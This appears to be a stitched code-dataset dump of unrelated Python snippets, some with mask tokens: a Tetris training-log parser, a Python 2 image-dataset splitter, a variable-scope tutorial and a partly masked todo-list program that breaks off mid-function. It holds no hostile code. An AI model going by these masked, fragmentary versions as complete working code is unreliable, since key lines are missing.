'score_per_train'][-1])
else:
self.data['score_per_train'].append((0, 0))
elif 'Training complete' in line:
training = False
if lc_avg_tmp:
mean = np.average(lc_avg_tmp)
std = np.std(lc_avg_tmp) / np.sqrt(len(lc_avg_tmp))
self.data['line_cleared_per_train'].append((mean, std))
if sc_avg_tmp:
mean = np.average(sc_avg_tmp)
std = np.std(sc_avg_tmp) / np.sqrt(len(sc_avg_tmp))
self.data['score_per_train'].append((mean, std))
if not training:
flocal = './model_checkpoint'
ftarget = '../pytorch_model/model_checkpoint'
ex_local = os.path.isfile(flocal)
ex_target = os.path.isfile(ftarget)
if ex_target and (ex_local and not filecmp.cmp(flocal,
ftarget) or not ex_local):
copyfile(ftarget, flocal)
self.data['filled'] = filled
self.data['size'] = size
self.data['rm_since_last_game'] = rm_since_last_game
class ModelParser:
def __init__(self, distributional=True):
self.last_update = -1
self.data = {}
self.distributional = distributional
def check_update(self):
flocal = './model_checkpoint'
if os.path.isfile(flocal):
latest = os.path.getmtime(flocal)
if latest > self.last_update:
print('New model found, updating...', flush=True)
self.last_update = latest
state = torch.load(flocal, map_location=torch.device('cpu'))
model_state = state['model_state_dict']
self.parse_state(model_state)
return True
return False
def parse(self, model):
self.parse_state(model.state_dict())
def parse_state(self, model_state):
self.data = {}
for k, v in model_state.items():
if 'weight' in k:
k = k.replace('.weight', '')
k = k.replace('seq.', '')
self.data[k] = v.cpu().numpy().ravel()
| import torch
import re
import sys
import os
import shutil
import filecmp
import numpy as np
from collections import defaultdict
from shutil import copyfile
sys.path.append('../')
class BoardParser:
def __init__(self):
self.file = open('../board_output', 'rb')
self.data = None
def update(self):
s = self.file.read()
if len(s) == 200:
self.data = np.fromstring(s, dtype=np.int8).reshape(20, 10)
self.file.seek(0)
class StatusParser:
def __init__(self):
self.board = np.memmap('../tmp/board', mode='r', dtype=np.int8, shape=(20, 10))
self.combo = np.memmap('../tmp/combo', mode='r', dtype=np.int32, shape=(1, ))
self.lines = np.memmap('../tmp/lines', mode='r', dtype=np.int32, shape=(1, ))
self.score = np.memmap('../tmp/score', mode='r', dtype=np.int32, shape=(1, ))
self.line_stats = np.memmap('../tmp/line_stats', mode='r', dtype=np.int32, shape=(4, ))
class Parser:
def __init__(self, filename):
self.filename = filename
self.last_update = -1
def check_update(self):
latest_update = os.path.getmtime(self.filename)
if latest_update > self.last_update:
self.last_update = latest_update
self.parse()
return True
return False
def parse(self):
score_re = 'Episode:\s*(?P<episode>\d*)\s*' \
'Score:\s*(?P<score>\d*)\s*' \
'Lines Cleared:\s*(?P<lines>\d*)'
train_re = 'Iteration:\s*(?P<iter>\d*)\s*' \
'training loss:\s*(?P<t_loss>\d*\.\d*)\s*' \
'validation loss:\s*(?P<v_loss>\d*\.\d*)±\s*(?P<v_loss_err>\d*\.\d*|nan)\s*' \
'gradient norm:\s*(?P<g_norm>\d*\.\d*)'
datasize_re = 'Training data size:\s*(?P<tsize>\d*)\s*' \
'Validation data size:\s*(?P<vsize>\d*)'
queue_re = 'Memory usage: (?P<filled>\d*) / (?P<size>\d*).*'
self.data = defaultdict(list)
size = 0
filled = 0
rm_since_last_game = 0
with open(self.filename) as f:
lc_avg_tmp = []
sc_avg_tmp = []
data_accum = 0
training = False
for line in f.readlines():
match_score_re = re.search(score_re, line)
match_train_re = re.search(train_re, line)
match_datasize_re = re.search(datasize_re, line)
match_queue_re = re.search(queue_re, line)
if match_score_re:
d = match_score_re.groupdict()
lc = int(d['lines'])
sc = int(d['score'])
self.data['line_cleared'].append(lc)
self.data['score'].append(sc)
self.data['data_accumulated'].append(data_accum)
lc_avg_tmp.append(lc)
sc_avg_tmp.append(sc)
rm_since_last_game = 0
elif match_train_re:
d = match_train_re.groupdict()
self.data['training_loss'].append(float(d['t_loss']))
self.data['validation_loss'].append(float(d['v_loss']))
if d['v_loss_err'] == 'nan':
self.data['validation_loss_err'].append(0)
else:
self.data['validation_loss_err'].append(float(d['v_loss_err']))
self.data['g_norm'].append(float(d['g_norm']))
#print(d['g_norm'])
elif match_datasize_re:
d = match_datasize_re.groupdict()
tsize = int(d['tsize'])
vsize = int(d['vsize'])
data_accum += (tsize + vsize)
elif match_queue_re:
d = match_queue_re.groupdict()
filled = int(d['filled'])
size = int(d['size'])
elif 'REMOVING UNUSED' in line:
rm_since_last_game += 1
elif 'proceed to training' in line:
training = True
if lc_avg_tmp:
mean = np.average(lc_avg_tmp)
std = np.std(lc_avg_tmp) / np.sqrt(len(lc_avg_tmp))
self.data['line_cleared_per_train'].append((mean, std))
lc_avg_tmp.clear()
else:
if self.data['line_cleared_per_train']:
self.data['line_cleared_per_train'].append(
self.data['line_cleared_per_train'][-1])
else:
self.data['line_cleared_per_train'].append((0, 0))
if sc_avg_tmp:
mean = np.average(sc_avg_tmp)
std = np.std(sc_avg_tmp) / np.sqrt(len(sc_avg_tmp))
self.data['score_per_train'].append((mean, std))
sc_avg_tmp.clear()
else:
if self.data['score_per_train']:
self.data['score_per_train'].append(
self.data['score_per_train'][-1])
else:
self.data['score_per_train'].append((0, 0))
elif 'Training complete' in line:
training = False
if lc_avg_tmp:
mean = np.average(lc_avg_tmp)
std = np.std(lc_avg_tmp) / np.sqrt(len(lc_avg_tmp))
self.data['line_cleared_per_train'].append((mean, std))
if sc_avg_tmp:
mean = np.average(sc_avg_tmp)
std = np.std(sc_avg_tmp) / np.sqrt(len(sc_avg_tmp))
self.data['score_per_train'].append((mean, std))
if not training:
flocal = './model_checkpoint'
ftarget = '../pytorch_model/model_checkpoint'
ex_local = os.path.isfile(flocal)
ex_target = os.path.isfile(ftarget)
if ex_target and ((ex_local and not filecmp.cmp(flocal, ftarget)) or not ex_local):
copyfile(ftarget, flocal)
self.data['filled'] = filled
self.data['size'] = size
self.data['rm_since_last_game'] = rm_since_last_game
class ModelParser:
def __init__(self, distributional=True):
self.last_update = -1
self.data = {}
self.distributional = distributional
def check_update(self):
flocal = './model_checkpoint'
if os.path.isfile(flocal):
latest = os.path.getmtime(flocal)
if latest > self.last_update:
print('New model found, updating...', flush=True)
self.last_update = latest
state = torch.load(flocal, map_location=torch.device('cpu'))
model_state = state['model_state_dict']
self.parse_state(model_state)
return True
return False
def parse(self, model):
self.parse_state(model.state_dict())
def parse_state(self, model_state):
self.data = {}
for k, v in model_state.items():
if 'weight' in k:
k = k.replace('.weight', '')
k = k.replace('seq.', '')
self.data[k] = v.cpu().numpy().ravel()
| [
11,
12,
13,
15,
17
] |
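A hedged usage sketch for the parser classes in the sample above; the log path and the polling interval are assumptions, not part of the original.

import time

log_parser = Parser('../train.log')        # assumed log file location
model_parser = ModelParser()
while True:
    if log_parser.check_update():          # re-parses only when the file's mtime changes
        print('episodes so far:', len(log_parser.data['score']))
    model_parser.check_update()            # reloads ./model_checkpoint when it changes
    time.sleep(5)                          # assumed polling interval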
628 | 32b3e65add5fb44320898b682e8f94f1460a32e7 | <mask token>
| def create_meme(word):
return f'this is your meme NEW VERSION {word}'
| null | null | null | [
0,
1
] |
629 | a714ac227d5185d7b4a932695ba6698e18d96341 | # -*- coding: utf-8 -*-
import sys
from os import listdir, makedirs, unlink
from os.path import isdir, join, isfile, exists
from shutil import copy
import random
def clearDirectory( path ): # delete all the files inside the dataset directory
for the_file in listdir(path):
file_path = join(path, the_file)
try:
if isfile(file_path):
unlink(file_path)
except Exception, e:
print e
print 'Number of arguments:', len(sys.argv), 'arguments.'
print 'argument list:', str(sys.argv)
if len(sys.argv) < 3:
    print 'Not enough arguments! You need to supply the dataset path and the test category.'
    sys.exit()
datasetPath = sys.argv[1]
category = sys.argv[2]
if len(sys.argv) > 3:
trainingNum = (int)(sys.argv[3])
else:
trainingNum = 0
if len(sys.argv) > 4:
testingNum = (int)(sys.argv[4])
else:
testingNum = 0
print 'dataset is ', datasetPath, ' and category is ', category
categories = [f for f in listdir(datasetPath) if isdir(join(datasetPath, f))]
if category not in categories:
    print 'Category is not in the dataset; please check that.'
    sys.exit()
print 'start generating training and testing file...'
categoryPath = datasetPath + '/' + category
categoryFiles = [f for f in listdir(categoryPath) if isfile(join(categoryPath,f))]
print category, 'contains', len(categoryFiles), 'files'
otherCategories = [x for x in categories if x != category]
otherCategoriesFiles = [y + '/' + x for y in otherCategories for x in listdir(datasetPath + '/' + y)]
defaultNum = (int)(len(categoryFiles))
if trainingNum <= 0:
trainingNum = defaultNum
elif trainingNum > defaultNum:
trainingNum = defaultNum
if testingNum <= 0:
    testingNum = min(defaultNum / 2, len(categoryFiles) - trainingNum)  # cap at files left after the training sample
elif testingNum > min(defaultNum / 2, len(categoryFiles) - trainingNum):
    testingNum = min(defaultNum / 2, len(categoryFiles) - trainingNum)
print 'trainingNum is', trainingNum
print 'testingNum is', testingNum
rand_smpl = [ categoryFiles[i] for i in sorted(random.sample(xrange(len(categoryFiles)), trainingNum)) ]
test_files = [x for x in categoryFiles if x not in rand_smpl]
test_smpl = [test_files[i] for i in random.sample(xrange(len(test_files)), testingNum)]
trainingDir = 'dataset/training'
testingDir = 'dataset/testing'
if not exists(trainingDir):
makedirs(trainingDir)
if not exists(testingDir):
makedirs(testingDir)
clearDirectory(trainingDir)
clearDirectory(testingDir)
text_file = open("training.txt", "w")
trainingIndex = 1
for jpgfile in rand_smpl:
filepath = categoryPath + '/' + jpgfile
outputFilePath = 'image_' + str(trainingIndex) + '.jpg'
text_file.write('dataset/training/' + outputFilePath + ' 1\n')
copy(filepath, trainingDir + '/' + outputFilePath)
trainingIndex += 1
training_smpl = [ otherCategoriesFiles[i] for i in random.sample(xrange(len(otherCategoriesFiles)), trainingNum)]
for jpgfile in training_smpl:
filepath = datasetPath + '/' + jpgfile
outputFilePath = 'image_' + str(trainingIndex) + '.jpg'
text_file.write('dataset/training/' + outputFilePath + ' 0\n')
copy(filepath, trainingDir + '/' + outputFilePath)
trainingIndex += 1
text_file.close()
text_file = open("testing.txt", "w")
trainingIndex = 1
for jpgfile in test_smpl:
filepath = categoryPath + '/' + jpgfile
outputFilePath = 'image_' + str(trainingIndex) + '.jpg'
text_file.write('dataset/testing/' + outputFilePath + ' 1\n')
copy(filepath, testingDir + '/' + outputFilePath)
trainingIndex += 1
testing_smpl = [ otherCategoriesFiles[i] for i in random.sample(xrange(len(otherCategoriesFiles)), testingNum)]
for jpgfile in testing_smpl:
filepath = datasetPath + '/' + jpgfile
outputFilePath = 'image_' + str(trainingIndex) + '.jpg'
text_file.write('dataset/testing/' + outputFilePath + ' 0\n')
copy(filepath, testingDir + '/' + outputFilePath)
trainingIndex += 1
text_file.close()
| null | null | null | null | [
0
] |
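The sample above is Python 2 throughout (print statements, `except Exception, e`, xrange). A sketch of how the deletion helper might read if ported to Python 3, keeping the original behaviour:

from os import listdir, unlink
from os.path import join, isfile

def clearDirectory(path):
    # delete every regular file directly inside the given directory
    for the_file in listdir(path):
        file_path = join(path, the_file)
        try:
            if isfile(file_path):
                unlink(file_path)
        except Exception as e:
            print(e)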
630 | 6af5faaaa9d894dd2b882cfe1bb8b8225780743c | <mask token>
def funky():
spam = 302
print(spam)
<mask token>
def sayHello(name):
print('Hello, ' + name)
<mask token>
| <mask token>
def funky():
spam = 302
print(spam)
<mask token>
def sayHello(name):
print('Hello, ' + name)
<mask token>
def spam(myName):
print('Hello, ' + myName)
myName = 'Waffles'
print('Your new name is ' + myName)
<mask token>
| <mask token>
print('Why not ?')
print(True and not False)
<mask token>
def funky():
spam = 302
print(spam)
funky()
print(spam)
def sayHello(name):
print('Hello, ' + name)
print('Say hello to Alice.')
<mask token>
sayHello(fizzy)
print('Do not forget to say hello to Bob.')
sayHello('Bob')
sayHello('Lee')
def spam(myName):
print('Hello, ' + myName)
myName = 'Waffles'
print('Your new name is ' + myName)
<mask token>
spam(myName)
print('Howdy, ' + myName)
| <mask token>
print('Why not ?')
print(True and not False)
spam = 1208
def funky():
spam = 302
print(spam)
funky()
print(spam)
def sayHello(name):
print('Hello, ' + name)
print('Say hello to Alice.')
fizzy = 'Alice'
sayHello(fizzy)
print('Do not forget to say hello to Bob.')
sayHello('Bob')
sayHello('Lee')
def spam(myName):
print('Hello, ' + myName)
myName = 'Waffles'
print('Your new name is ' + myName)
myName = 'Albert'
spam(myName)
print('Howdy, ' + myName)
| '''
# VariableScope.py
#
# Written by leezhm on 13th March, 2012.
#
# Copyright (C) leezhm(c)126.com. All Right Reserved.
#
# For Chapter 6 Dragon Realm
#
# <<Invent Your Own Computer Games with Python>>
'''
print('Why not ?')
print(True and not False)
# A global variable named "spam"
spam = 1208
# This block doesn't run until funky() is called.
def funky() :
# We read the global variable's value:
# print(spam)
# We create a local variable named "spam"
# instead of changing the value of the global variable "spam"
spam = 302
# The name "spam" now refers to the local variable only
# for the rest of this function:
print(spam)
# Call the function funky():
funky()
# The global variable was not changed in funky():
print(spam)
# Function with parameters
def sayHello(name) :
print('Hello, ' + name)
print('Say hello to Alice.')
fizzy = 'Alice'
sayHello(fizzy)
print('Do not forget to say hello to Bob.')
sayHello('Bob')
sayHello('Lee')
def spam(myName) :
print('Hello, ' + myName)
myName = 'Waffles'
print('Your new name is ' + myName)
myName = 'Albert'
spam(myName)
print('Howdy, ' + myName) | [
2,
3,
4,
5,
6
] |
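The scope demo above shows funky() shadowing the global spam; for contrast, a sketch of the `global` statement, which makes the assignment rebind the module-level name instead:

spam = 1208

def funky_global():
    global spam   # target the module-level variable instead of creating a local
    spam = 302

funky_global()
print(spam)       # prints 302, not 1208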
631 | 98bd4eb25a76fb9184f9abfcb920a6fbe46b9394 | <mask token>
| <mask token>
with open('sub.json', 'r') as subject_file:
subjects = json.load(subject_file)
print(json.dumps(subjects, separators=(',', ':')))
| <mask token>
subjects = []
with open('sub.json', 'r') as subject_file:
subjects = json.load(subject_file)
print(json.dumps(subjects, separators=(',', ':')))
| import json
subjects = []
with open('sub.json', 'r') as subject_file:
subjects = json.load(subject_file)
print(json.dumps(subjects, separators=(',', ':')))
| import json
subjects = []
with open("sub.json", 'r') as subject_file:
subjects = json.load(subject_file)
print(json.dumps(subjects, separators=(',',':')))
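# Note: separators=(',', ':') strips the default spaces after ',' and ':' to
# produce the most compact JSON; a human-readable dump would use indent instead,
# e.g. print(json.dumps(subjects, indent=2)).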
| [
0,
1,
2,
3,
4
] |
632 | 168a12e6653a0526f29c163913def50147481154 | <mask token>
class ListItem:
"""A custom object that stores four pieces of data representing each
entry in the todo list. Contains the text of the todo list entry,
the priority of the entry, the group code (NYI), and the visibility of
the entry"""
def __init__(self, text, priority, group, visible):
self.text = text
self.priority = priority
self.group = group
self.visible = visible
<mask token>
def check_priority_overlap(priority_to_check, todo_list):
"""The purpose of this function is to check if the user's priority
number input overlaps with a priority number already in the list,
and if it does, prompts the user whether they want to keep it, change
it, or move everything in the list that has a larger priority value up
by one.
:param priority_to_check: the number to check for overlap with
:param todo_list: the list of ListItem objects to check in
:returns the priority value, either changed or the original input"""
overlap = False
for item in todo_list:
if item.priority == priority_to_check:
overlap = True
if overlap:
answer = 0
while answer > 3 or answer < 1:
answer = clean_input(
"""The priority number you entered overlaps with another entry's priority. Enter:
1 to change priority number
2 to leave as is with overlap
3 to push all priority numbers below this entry down by 1"""
)
if answer > 3 or answer < 1:
print('Invalid Option Selected\nPlease Try Again')
if answer == 1:
priority_to_check = check_priority_overlap(int(clean_input(
'New Priority:')), todo_list)
elif answer == 3:
cascade_list(priority_to_check, todo_list)
return priority_to_check
<mask token>
def clean_input(prompt='Error'):
"""The purpose of this function is to prompt the user for a numerical
    input and only accept a numerical input; empty and textual entries are rejected.
:param prompt: the prompt the user sees, default is Error
:returns the user input as a float"""
text = True
phrase = '0'
while text:
phrase = input(prompt + '\n')
try:
float(phrase)
text = False
except ValueError:
print('Error: Non-Numeric Entry Detected')
return float(phrase)
<mask token>
def add_item(todo_list):
"""The purpose of this function is to prompt the user for the two
fields of necessary information to make a new entry in the todo list,
the item name and priority, checking if the priority overlaps with an
existing entry in the todo list.
:param todo_list: the list of ListItem objects to add a new ListItem
object to
:returns nothing"""
text = input('Please enter the name of the new item\n')
priority = check_priority_overlap(int(clean_input(
'Please enter the priority of this item')), todo_list)
group = 0
visible = True
todo_list.insert(0, ListItem(text, priority, group, visible))
return
<mask token>
def mark_complete(todo_list):
"""The purpose of this function is to mark a selectedListItem object as
hidden and not to be printed unless specified, apart from selecting items.
:param todo_list: the list of ListItem objects to modify
:returns nothing"""
item = select_item(todo_list,
"""Please enter the item number you wish to Mark Completed and hide from the list
Enter a negative number or zero to cancel"""
)
if item >= 0:
todo_list[item].visible = False
return
<mask token>
def check_list_status(todo_list):
"""The purpose of this function is to check whether there are visible
items in the list, the entire list is hidden, or the list contains no
more ListItem objects
:param todo_list: the list of ListItem objects to check
    :returns 0 if visible items exist, 1 if the list is empty, 2 if every item is hidden"""
if len(todo_list) == 0:
state = 1
else:
state = 2
for item_index in range(len(todo_list)):
if todo_list[item_index].visible:
state = 0
return state
<mask token>
| <mask token>
class ListItem:
"""A custom object that stores four pieces of data representing each
entry in the todo list. Contains the text of the todo list entry,
the priority of the entry, the group code (NYI), and the visibility of
the entry"""
def __init__(self, text, priority, group, visible):
self.text = text
self.priority = priority
self.group = group
self.visible = visible
<mask token>
def check_priority_overlap(priority_to_check, todo_list):
"""The purpose of this function is to check if the user's priority
number input overlaps with a priority number already in the list,
and if it does, prompts the user whether they want to keep it, change
it, or move everything in the list that has a larger priority value up
by one.
:param priority_to_check: the number to check for overlap with
:param todo_list: the list of ListItem objects to check in
:returns the priority value, either changed or the original input"""
overlap = False
for item in todo_list:
if item.priority == priority_to_check:
overlap = True
if overlap:
answer = 0
while answer > 3 or answer < 1:
answer = clean_input(
"""The priority number you entered overlaps with another entry's priority. Enter:
1 to change priority number
2 to leave as is with overlap
3 to push all priority numbers below this entry down by 1"""
)
if answer > 3 or answer < 1:
print('Invalid Option Selected\nPlease Try Again')
if answer == 1:
priority_to_check = check_priority_overlap(int(clean_input(
'New Priority:')), todo_list)
elif answer == 3:
cascade_list(priority_to_check, todo_list)
return priority_to_check
<mask token>
def clean_input(prompt='Error'):
"""The purpose of this function is to prompt the user for a numerical
    input and only accept a numerical input; empty and textual entries are rejected.
:param prompt: the prompt the user sees, default is Error
:returns the user input as a float"""
text = True
phrase = '0'
while text:
phrase = input(prompt + '\n')
try:
float(phrase)
text = False
except ValueError:
print('Error: Non-Numeric Entry Detected')
return float(phrase)
<mask token>
def save_list(todo_list, save_location):
"""The purpose of this function is to save a list of ListItem objects to a
specified location in a .txt file with the first line of the document
being an explanation of the file format being used.
:param todo_list: the list of ListItem objects to save to the save file
:param save_location: the location to create or overwrite the save file
:returns nothing"""
data_file_w = open(save_location, 'w')
data_file_w.write(
"""Warning: The Todo-List Program will not be able to load this save file if it is incorrectly modified. Modify at your own risk. The structure is Entry Text, Entry Priority as a number, Entry Group as a number (Not Yet Utilized, but necessary), and Entry Visibility as a boolean, each on a separate line, a single line gap in between, and the very first line is skipped
"""
)
for item in todo_list:
data_file_w.write('{0}\n{1}\n{2}\n{3}\n\n'.format(item.text, str(
item.priority), str(item.group), str(item.visible)))
data_file_w.close()
return
def add_item(todo_list):
"""The purpose of this function is to prompt the user for the two
fields of necessary information to make a new entry in the todo list,
the item name and priority, checking if the priority overlaps with an
existing entry in the todo list.
:param todo_list: the list of ListItem objects to add a new ListItem
object to
:returns nothing"""
text = input('Please enter the name of the new item\n')
priority = check_priority_overlap(int(clean_input(
'Please enter the priority of this item')), todo_list)
group = 0
visible = True
todo_list.insert(0, ListItem(text, priority, group, visible))
return
<mask token>
def remove_item(todo_list):
"""The purpose of this function is to delete a ListItem object from a
list of ListItem objects by prompting the user for the index and
verifying they want to delete the item.
:param todo_list: the list of ListItem objects from which to remove
one object
:returns nothing"""
item = select_item(todo_list,
"""Please enter the item number you wish to remove
Enter a negative number or zero to cancel"""
)
if item >= 0:
todo_list.pop(item)
return
def mark_complete(todo_list):
"""The purpose of this function is to mark a selectedListItem object as
hidden and not to be printed unless specified, apart from selecting items.
:param todo_list: the list of ListItem objects to modify
:returns nothing"""
item = select_item(todo_list,
"""Please enter the item number you wish to Mark Completed and hide from the list
Enter a negative number or zero to cancel"""
)
if item >= 0:
todo_list[item].visible = False
return
def edit_item(todo_list):
"""The purpose of this function is to edit a ListItem object in the
list of ListItem objects, changing either the name or priority
:param todo_list: the list of ListItem objects that gets one object
modified
:returns nothing"""
item = select_item(todo_list,
"""Please enter the item number you wish to edit
Enter a negative number or zero to cancel"""
)
if item >= 0:
while True:
value = clean_input(
"""Which value would you like to edit? Enter:
1 for the Item Text (Currently: {0})
2 for the Item Priority (Currently: {1})
3 to Cancel and Exit"""
.format(todo_list[item].text, str(todo_list[item].priority)))
if value == 1:
print('The Current Text is: {0}'.format(todo_list[item].text))
todo_list[item].text = input('New Text:\n')
elif value == 2:
print('The Current Priority is: {0}'.format(str(todo_list[
item].priority)))
todo_list[item].priority = check_priority_overlap(int(
clean_input('New Priority:')), todo_list)
elif value == 3:
break
else:
print('Invalid Input - Please Try Again')
return
def check_list_status(todo_list):
"""The purpose of this function is to check whether there are visible
items in the list, the entire list is hidden, or the list contains no
more ListItem objects
:param todo_list: the list of ListItem objects to check
    :returns 0 if visible items exist, 1 if the list is empty, 2 if every item is hidden"""
if len(todo_list) == 0:
state = 1
else:
state = 2
for item_index in range(len(todo_list)):
if todo_list[item_index].visible:
state = 0
return state
<mask token>
| <mask token>
class ListItem:
"""A custom object that stores four pieces of data representing each
entry in the todo list. Contains the text of the todo list entry,
the priority of the entry, the group code (NYI), and the visibility of
the entry"""
def __init__(self, text, priority, group, visible):
self.text = text
self.priority = priority
self.group = group
self.visible = visible
def concept_demonstration():
"""The purpose of this function is to prompt the user for numbers and
strings and manipulate them to demonstrate programming fluency with
string and integer operations.
:returns nothing"""
number = clean_input('Please enter a positive number')
number2 = clean_input('Please enter a number')
while number2 == 0:
print('Error: Cannot Divide by 0')
number2 = clean_input('Please enter a different number')
color = input('Please enter a color\n')
thing = input('Please enter a thing\n')
thing2 = thing + ' '
location = input('Please enter a location\n')
print(str(number) + ' raised to the power of ' + str(number2) + ' is ' +
str(number ** number2))
print('{0} multiplied by {1} is {2}'.format(str(number), str(number2),
str(number * number2)))
print('{0} divided by {1} is {2}'.format(str(number), str(number2), str
(number / number2)))
print('The remainder from dividing {0} by {1} is {2}'.format(str(
number), str(number2), str(number % number2)))
print('{0} divided by {1} rounded down is {2}'.format(str(number), str(
number2), str(number // number2)))
print('{0} plus {1} is {2}'.format(str(number), str(number2), str(
number + number2)))
print('{0} minus {1} is {2}'.format(str(number), str(number2), str(
number - number2)))
if number > 1:
print("The {0} at {1} yelled '{2}'".format(color + ' ' + thing,
location, thing2 * int(number - 1) + thing))
elif number < 0:
print(
"""The {0} at {1} yelled '{2}'
You entered a negative number when a positive number was requested, so you made the {3} mute. Good Job."""
.format(color + ' ' + thing, location, thing2 * int(number), thing)
)
else:
print("The {0} at {1} yelled '{2}'".format(color + ' ' + thing,
location, thing * int(number)))
return
<mask token>
def check_priority_overlap(priority_to_check, todo_list):
"""The purpose of this function is to check if the user's priority
number input overlaps with a priority number already in the list,
and if it does, prompts the user whether they want to keep it, change
it, or move everything in the list that has a larger priority value up
by one.
:param priority_to_check: the number to check for overlap with
:param todo_list: the list of ListItem objects to check in
:returns the priority value, either changed or the original input"""
overlap = False
for item in todo_list:
if item.priority == priority_to_check:
overlap = True
if overlap:
answer = 0
while answer > 3 or answer < 1:
answer = clean_input(
"""The priority number you entered overlaps with another entry's priority. Enter:
1 to change priority number
2 to leave as is with overlap
3 to push all priority numbers below this entry down by 1"""
)
if answer > 3 or answer < 1:
print('Invalid Option Selected\nPlease Try Again')
if answer == 1:
priority_to_check = check_priority_overlap(int(clean_input(
'New Priority:')), todo_list)
elif answer == 3:
cascade_list(priority_to_check, todo_list)
return priority_to_check
<mask token>
def clean_input(prompt='Error'):
"""The purpose of this function is to prompt the user for a numerical
    input and only accept a numerical input; empty and textual entries are rejected.
:param prompt: the prompt the user sees, default is Error
:returns the user input as a float"""
text = True
phrase = '0'
while text:
phrase = input(prompt + '\n')
try:
float(phrase)
text = False
except ValueError:
print('Error: Non-Numeric Entry Detected')
return float(phrase)
<mask token>
def save_list(todo_list, save_location):
"""The purpose of this function is to save a list of ListItem objects to a
specified location in a .txt file with the first line of the document
being an explanation of the file format being used.
:param todo_list: the list of ListItem objects to save to the save file
:param save_location: the location to create or overwrite the save file
:returns nothing"""
data_file_w = open(save_location, 'w')
data_file_w.write(
"""Warning: The Todo-List Program will not be able to load this save file if it is incorrectly modified. Modify at your own risk. The structure is Entry Text, Entry Priority as a number, Entry Group as a number (Not Yet Utilized, but necessary), and Entry Visibility as a boolean, each on a separate line, a single line gap in between, and the very first line is skipped
"""
)
for item in todo_list:
data_file_w.write('{0}\n{1}\n{2}\n{3}\n\n'.format(item.text, str(
item.priority), str(item.group), str(item.visible)))
data_file_w.close()
return
def add_item(todo_list):
"""The purpose of this function is to prompt the user for the two
fields of necessary information to make a new entry in the todo list,
the item name and priority, checking if the priority overlaps with an
existing entry in the todo list.
:param todo_list: the list of ListItem objects to add a new ListItem
object to
:returns nothing"""
text = input('Please enter the name of the new item\n')
priority = check_priority_overlap(int(clean_input(
'Please enter the priority of this item')), todo_list)
group = 0
visible = True
todo_list.insert(0, ListItem(text, priority, group, visible))
return
<mask token>
def remove_item(todo_list):
"""The purpose of this function is to delete a ListItem object from a
list of ListItem objects by prompting the user for the index and
verifying they want to delete the item.
:param todo_list: the list of ListItem objects from which to remove
one object
:returns nothing"""
item = select_item(todo_list,
"""Please enter the item number you wish to remove
Enter a negative number or zero to cancel"""
)
if item >= 0:
todo_list.pop(item)
return
def mark_complete(todo_list):
"""The purpose of this function is to mark a selectedListItem object as
hidden and not to be printed unless specified, apart from selecting items.
:param todo_list: the list of ListItem objects to modify
:returns nothing"""
item = select_item(todo_list,
"""Please enter the item number you wish to Mark Completed and hide from the list
Enter a negative number or zero to cancel"""
)
if item >= 0:
todo_list[item].visible = False
return
def edit_item(todo_list):
"""The purpose of this function is to edit a ListItem object in the
list of ListItem objects, changing either the name or priority
:param todo_list: the list of ListItem objects that gets one object
modified
:returns nothing"""
item = select_item(todo_list,
"""Please enter the item number you wish to edit
Enter a negative number or zero to cancel"""
)
if item >= 0:
while True:
value = clean_input(
"""Which value would you like to edit? Enter:
1 for the Item Text (Currently: {0})
2 for the Item Priority (Currently: {1})
3 to Cancel and Exit"""
.format(todo_list[item].text, str(todo_list[item].priority)))
if value == 1:
print('The Current Text is: {0}'.format(todo_list[item].text))
todo_list[item].text = input('New Text:\n')
elif value == 2:
print('The Current Priority is: {0}'.format(str(todo_list[
item].priority)))
todo_list[item].priority = check_priority_overlap(int(
clean_input('New Priority:')), todo_list)
elif value == 3:
break
else:
print('Invalid Input - Please Try Again')
return
def check_list_status(todo_list):
"""The purpose of this function is to check whether there are visible
items in the list, the entire list is hidden, or the list contains no
more ListItem objects
:param todo_list: the list of ListItem objects to check
    :returns 0 if visible items exist, 1 if the list is empty, 2 if every item is hidden"""
if len(todo_list) == 0:
state = 1
else:
state = 2
for item_index in range(len(todo_list)):
if todo_list[item_index].visible:
state = 0
return state
<mask token>
| <mask token>
class ListItem:
"""A custom object that stores four pieces of data representing each
entry in the todo list. Contains the text of the todo list entry,
the priority of the entry, the group code (NYI), and the visibility of
the entry"""
def __init__(self, text, priority, group, visible):
self.text = text
self.priority = priority
self.group = group
self.visible = visible
def concept_demonstration():
"""The purpose of this function is to prompt the user for numbers and
strings and manipulate them to demonstrate programming fluency with
string and integer operations.
:returns nothing"""
number = clean_input('Please enter a positive number')
number2 = clean_input('Please enter a number')
while number2 == 0:
print('Error: Cannot Divide by 0')
number2 = clean_input('Please enter a different number')
color = input('Please enter a color\n')
thing = input('Please enter a thing\n')
thing2 = thing + ' '
location = input('Please enter a location\n')
print(str(number) + ' raised to the power of ' + str(number2) + ' is ' +
str(number ** number2))
print('{0} multiplied by {1} is {2}'.format(str(number), str(number2),
str(number * number2)))
print('{0} divided by {1} is {2}'.format(str(number), str(number2), str
(number / number2)))
print('The remainder from dividing {0} by {1} is {2}'.format(str(
number), str(number2), str(number % number2)))
print('{0} divided by {1} rounded down is {2}'.format(str(number), str(
number2), str(number // number2)))
print('{0} plus {1} is {2}'.format(str(number), str(number2), str(
number + number2)))
print('{0} minus {1} is {2}'.format(str(number), str(number2), str(
number - number2)))
if number > 1:
print("The {0} at {1} yelled '{2}'".format(color + ' ' + thing,
location, thing2 * int(number - 1) + thing))
elif number < 0:
print(
"""The {0} at {1} yelled '{2}'
You entered a negative number when a positive number was requested, so you made the {3} mute. Good Job."""
.format(color + ' ' + thing, location, thing2 * int(number), thing)
)
else:
print("The {0} at {1} yelled '{2}'".format(color + ' ' + thing,
location, thing * int(number)))
return
def cascade_list(priority_to_cascade_from, todo_list):
"""The purpose of this function is to decrement the priority number of
every item in the provided todo list greater than the priority number
provided.
:param priority_to_cascade_from: the number that is inserted by moving
everything equal to or greater than up by one
:param todo_list: the list of ListItem objects to check in"""
for item in todo_list:
if item.priority >= priority_to_cascade_from:
item.priority += 1
return
def check_priority_overlap(priority_to_check, todo_list):
"""The purpose of this function is to check if the user's priority
number input overlaps with a priority number already in the list,
and if it does, prompts the user whether they want to keep it, change
it, or move everything in the list that has a larger priority value up
by one.
:param priority_to_check: the number to check for overlap with
:param todo_list: the list of ListItem objects to check in
:returns the priority value, either changed or the original input"""
overlap = False
for item in todo_list:
if item.priority == priority_to_check:
overlap = True
if overlap:
answer = 0
while answer > 3 or answer < 1:
answer = clean_input(
"""The priority number you entered overlaps with another entry's priority. Enter:
1 to change priority number
2 to leave as is with overlap
3 to push all priority numbers below this entry down by 1"""
)
if answer > 3 or answer < 1:
print('Invalid Option Selected\nPlease Try Again')
if answer == 1:
